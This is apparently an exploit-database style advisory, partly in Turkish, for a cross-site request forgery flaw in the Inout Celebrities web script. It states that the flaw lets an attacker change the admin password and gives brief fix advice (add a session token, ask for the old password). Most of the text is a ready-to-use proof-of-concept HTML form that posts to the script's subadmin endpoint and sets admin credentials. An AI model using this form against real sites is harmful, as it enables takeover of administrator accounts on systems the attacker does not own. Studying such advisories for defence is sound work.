<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN

# Script Name : Inout Celebrities

# Bug Type : XSRF

# Infection : Admin Sifresi Deistirilebilir.

# Demo Script : http://www.inoutscripts.com/demo/inout_celebrities/

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=subadmin id=subadmin enctype=multipart/form-data method=post action=http://SITE/inout_celebrities/admin/omg/subadminuploadsuccess onSubmit=return verifyForm_subadmin()>
<input type=text name=username value=admin size=30>
<input type=password name=password value=admin size=30>
<input type=password name=confirmpassword value=admin size=30>
<input type=text name=email value=admin size=30>
<input type=checkbox name=blog value=1>
<input type=checkbox name=news value=1>
<input type=checkbox name=album value=1>
<input type=submit name=Submit value=Add>

< -- bug code end of -- >